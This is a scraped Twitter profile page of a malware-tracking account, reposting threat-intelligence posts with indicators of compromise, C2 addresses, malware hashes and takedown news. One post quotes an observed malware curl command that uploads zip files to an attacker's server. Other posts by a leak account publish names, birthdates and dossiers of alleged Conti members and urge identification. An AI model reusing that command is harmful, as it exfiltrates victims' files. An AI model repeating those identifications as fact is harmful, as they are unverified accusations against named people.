Cryptolaemus (@cryptolaemus1) 's Twitter Profile
Cryptolaemus

@cryptolaemus1

Where are mealybugs now!?! We is hungry and no one wants to play anymore. Where everyone at?

ID: 1062793781588697090

linkhttps://paste.cryptolaemus.com/about/ calendar_today14-11-2018 19:45:58

23,23K Tweet

19,19K Followers

206 Following

Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

1/ First comes Stern. Then Tramp (aka Trump). And then the rest. These are the people behind Conti, Trickbot, Black Basta. Their anonymity ends now. 🧵👇

Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

🎁CONTI LEAK: Video they tried to bury! 6+ Conti members on a private jet. TARGET’s birthday — $10M bounty on his head. Filmed by TARGET himself. Original erased — we kept a copy. 🎥Watch and help identify him! Lawrence Abrams pancak3 ςεяβεяμs - мαℓωαяε яεsεαяςнεя #CyberCrime #Leak

Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

💥EXPOSED: We uncovered the Professor behind Conti Ransomware! Dossier, flights, docs, leaks. 🔗Full evidence here: justpaste.it/ilpg5 💰 $10M bounty on the line — and we're burning another $10M to take them down. Share now! #Conti #Trickbot #Cybersecurity

💥EXPOSED: We uncovered the Professor behind Conti Ransomware! Dossier, flights, docs, leaks.

🔗Full evidence here: justpaste.it/ilpg5

💰 $10M bounty on the line — and we're burning another $10M to take them down.  Share now! 
#Conti #Trickbot #Cybersecurity
Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

💥 The Reveal: Stern’s New Face Remember when I promised to reveal the new face of the Conti leader after his plastic surgery? The time has come. 📄 Updated Dossier: justpaste.it/ilesl Stern thought changing his appearance would keep him safe. Turns out, it wasn’t enough.

💥 The Reveal: Stern’s New Face

Remember when I promised to reveal the new face of the Conti leader after his plastic surgery? The time has come.

📄 Updated Dossier: justpaste.it/ilesl

Stern thought changing his appearance would keep him safe. Turns out, it wasn’t enough.
Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

🚨 New Investigation: Bondarenko Arkady — Negotiator for the Conti Group. 🔗Details, analysis, and Dossier: justpaste.it/iqo8u #Conti #Cybercrime #Ransomware

🚨 New Investigation: Bondarenko Arkady  — Negotiator for the Conti Group.

🔗Details, analysis, and Dossier: justpaste.it/iqo8u

#Conti #Cybercrime #Ransomware
Yogesh Londhe (@suyog41) 's Twitter Profile Photo

Octalyn Stealer 31a11e53ebee97b9add3d6a7567f7d16 Telegram: https://t[.]me/ZeroTraceD3V YouTube: https://www[.]youtube[.]com/watch?v=TN9yas3uqr0 GitHub: https://github[.]com/luis22d/Octalyn-Stealer-C-Telegram #Octalyn #Stealer #IOC

Octalyn Stealer

31a11e53ebee97b9add3d6a7567f7d16

Telegram: https://t[.]me/ZeroTraceD3V

YouTube: https://www[.]youtube[.]com/watch?v=TN9yas3uqr0

GitHub: https://github[.]com/luis22d/Octalyn-Stealer-C-Telegram

#Octalyn #Stealer #IOC
The Shadowserver Foundation (@shadowserver) 's Twitter Profile Photo

We have shared a Special Report on IPs infected with Latrodectus malware during 2025-04-26 to 2025-05-20. This is one of the results of the continued international Law Enforcement action called Operation Endgame Season 2.0 Over 44K infected IPs seen: dashboard.shadowserver.org/statistics/com…

We have shared a Special Report on IPs infected with Latrodectus malware during  2025-04-26 to 2025-05-20. This is one of the results of the continued international Law Enforcement action called Operation Endgame Season 2.0

Over 44K infected IPs seen: dashboard.shadowserver.org/statistics/com…
Germán Fernández (@1zrr4h) 's Twitter Profile Photo

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…). Botnet: grp0005 C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024). Bumblebee has been used in ransomware attacks. MalwareHunterTeam

#Bumblebee from nir-soft[.]org (x.com/1ZRR4H/status/…).
Botnet: grp0005
C2: 188.40.187.152 (although not flagged by any AV, the IP has been linked to Bumblebee campaigns since approximately April 2024).

Bumblebee has been used in ransomware attacks.

<a href="/malwrhunterteam/">MalwareHunterTeam</a>
Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

Tsaryov Mikhail Mikhailovich 20.04.1989 Aliases: Mango 🔗Dossier: justpaste.it/ee50n Mango is a key coordinator and the “grey cardinal” within the Conti/TrickBot ecosystem. #Conti #Cybercrime #Ransomware

Tsaryov Mikhail Mikhailovich 20.04.1989
Aliases: Mango

🔗Dossier: justpaste.it/ee50n

Mango is a key coordinator and the “grey cardinal” within the Conti/TrickBot ecosystem.

#Conti #Cybercrime #Ransomware
Politie Landelijke Opsporing en Interventies (@pol_ops_int) 's Twitter Profile Photo

In een internationale operatie heeft Team High Tech Crime, onder gezag van Landelijk Parket, een sleuteldienst voor ontwikkelaars van #malware onderuitgehaald. Hierdoor worden slachtoffers van malware voorkomen. Lees meer: politie.nl/nieuws/2025/me… #bestrijding #cybercriminaliteit

In een internationale operatie heeft Team High Tech Crime, onder gezag van <a href="/landelijkparket/">Landelijk Parket</a>, een sleuteldienst voor ontwikkelaars van #malware onderuitgehaald. Hierdoor worden slachtoffers van malware voorkomen. Lees meer: politie.nl/nieuws/2025/me…
 #bestrijding #cybercriminaliteit
Squiblydoo (@squiblydooblog) 's Twitter Profile Photo

Probably the best #ZhongStealer decoy yet. 59af8a487068c555ea22393b0233cb65 Sent to user disguised as an image. "2020505268988jpg.pif" #Signed with EV Certificate "运城市盐湖区风颜商贸有限公司" 🔗🧵

Probably the best #ZhongStealer decoy yet.
59af8a487068c555ea22393b0233cb65

Sent to user disguised as an image. "2020505268988jpg.pif" 

#Signed with EV Certificate "运城市盐湖区风颜商贸有限公司"

🔗🧵
Conti Trickbot Leaks Final (@gangexposed) 's Twitter Profile Photo

Andrey Yuryevich Zhuykov 18.02.1982 Aliases: Defender, Dif 🔗Dossier: justpaste.it/jcn0i System Administrator of the Conti. Defender is a key technical specialist responsible for the viability of the group’s entire infrastructure. #Conti #Cybercrime #Ransomware

Andrey Yuryevich Zhuykov 18.02.1982
Aliases: Defender, Dif

🔗Dossier: justpaste.it/jcn0i

System Administrator of the Conti. 
Defender is a key technical specialist responsible for the viability of the group’s entire infrastructure.

#Conti #Cybercrime #Ransomware
ܛܔܔܔܛܔܛܔܛ (@skocherhan) 's Twitter Profile Photo

77[.]83[.]207[.]89 AS216341 OPTIMA LLC 🇭🇰 godblessyou[.]world blessyoumother[.]world wheremylifestreet[.]cloud clientforbigbug[.]cloud sunriseopen[.]com #NetSupportRAT ANY.RUN abuse.ch

77[.]83[.]207[.]89
AS216341 OPTIMA LLC 🇭🇰

godblessyou[.]world 
blessyoumother[.]world 
wheremylifestreet[.]cloud
clientforbigbug[.]cloud
sunriseopen[.]com

#NetSupportRAT <a href="/anyrun_app/">ANY.RUN</a> <a href="/abuse_ch/">abuse.ch</a>
JAMESWT (@jameswt_wt) 's Twitter Profile Photo

troubleinternetverif.]com/ HzGTvHpk.txt Xg6fkCIC.txt cloudverifsecure.]com/o8fZccbu.txt 👇 83.222.190.]174 #netsupport #rat Client32.ini bb6ccd9de0cbae55bc41a0984c4a7630 thanksbadbeer.]com beerbadlove.]com Samples bazaar.abuse.ch/browse/tag/83-… app.any.run/tasks/e3ff4332… Mikhail Kasimov

troubleinternetverif.]com/
HzGTvHpk.txt
Xg6fkCIC.txt

cloudverifsecure.]com/o8fZccbu.txt 
👇
83.222.190.]174
#netsupport #rat
Client32.ini
bb6ccd9de0cbae55bc41a0984c4a7630
thanksbadbeer.]com
beerbadlove.]com

Samples
bazaar.abuse.ch/browse/tag/83-…

app.any.run/tasks/e3ff4332…

<a href="/500mk500/">Mikhail Kasimov</a>
JAMESWT (@jameswt_wt) 's Twitter Profile Photo

👇 cahasdxca123.]com/lander/jdfcxn/ pass. py exts. py script.enc 👇 "C:\WINDOWS\system32\curl.exe" -X POST https://domainservicecontrol.[com/upload.php -F file=@C:\\Temp\*.zip Related Samples bazaar.abuse.ch/browse/tag/cah… AnyRun app.any.run/tasks/3b904d30… Mikhail Kasimov ܛܔܔܔܛܔܛܔܛ Kelsey

👇
cahasdxca123.]com/lander/jdfcxn/
pass. py
exts. py
script.enc
👇
"C:\WINDOWS\system32\curl.exe" -X POST https://domainservicecontrol.[com/upload.php -F file=@C:\\Temp\*.zip
Related Samples
bazaar.abuse.ch/browse/tag/cah…
AnyRun
app.any.run/tasks/3b904d30…

<a href="/500mk500/">Mikhail Kasimov</a> <a href="/skocherhan/">ܛܔܔܔܛܔܛܔܛ</a> <a href="/k3dg3/">Kelsey</a>
BleepingComputer (@bleepincomputer) 's Twitter Profile Photo

Police takes down AVCheck antivirus site used by cybercriminals - Bill Toulas bleepingcomputer.com/news/security/… bleepingcomputer.com/news/security/…

vxdb (@vxdb) 's Twitter Profile Photo

AvCheck[.]net has been seized by law enforcement. AVCheck was used by criminals to test whether their malware is detected by commercial antivirus software before its ready to be used in the wild. Similar to something like VirusTotal. This takedown is apart of Operation Endgame.

AvCheck[.]net has been seized by law enforcement. AVCheck was used by criminals to test whether their malware is detected by commercial antivirus software before its ready to be used in the wild. Similar to something like VirusTotal. 

This takedown is apart of Operation Endgame.